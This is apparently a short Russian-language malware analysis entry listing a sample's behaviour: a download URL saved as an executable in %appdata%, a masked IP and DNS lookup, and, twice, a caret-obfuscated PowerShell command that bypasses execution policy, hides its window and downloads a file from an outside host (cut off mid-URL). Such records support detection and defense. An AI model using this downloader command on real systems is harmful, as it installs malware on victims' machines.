Техническая информация
- http://folueopa.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWeR^SHE^L^l.Exe^ -eX^ECu^tiOn^pOlI^c^Y^ ByPAss -N^OPROFIlE^ -wiNDOW^s^t^YLE^ ^h^IDDe^n^ (n^E^W-^ObJEct ^sYSteM.Net^.wE^BcL^iENT).^Down^lo^a^d^FIl^E^('http://folueopa.t...
- '34.##9.100.209':443
- DNS ASK fo###opa.top
- '<SYSTEM32>\cmd.exe' /c "POWeR^SHE^L^l.Exe^ -eX^ECu^tiOn^pOlI^c^Y^ ByPAss -N^OPROFIlE^ -wiNDOW^s^t^YLE^ ^h^IDDe^n^ (n^E^W-^ObJEct ^sYSteM.Net^.wE^BcL^iENT).^Down^lo^a^d^FIl^E^('http://folueopa.t... (со скрытым окном)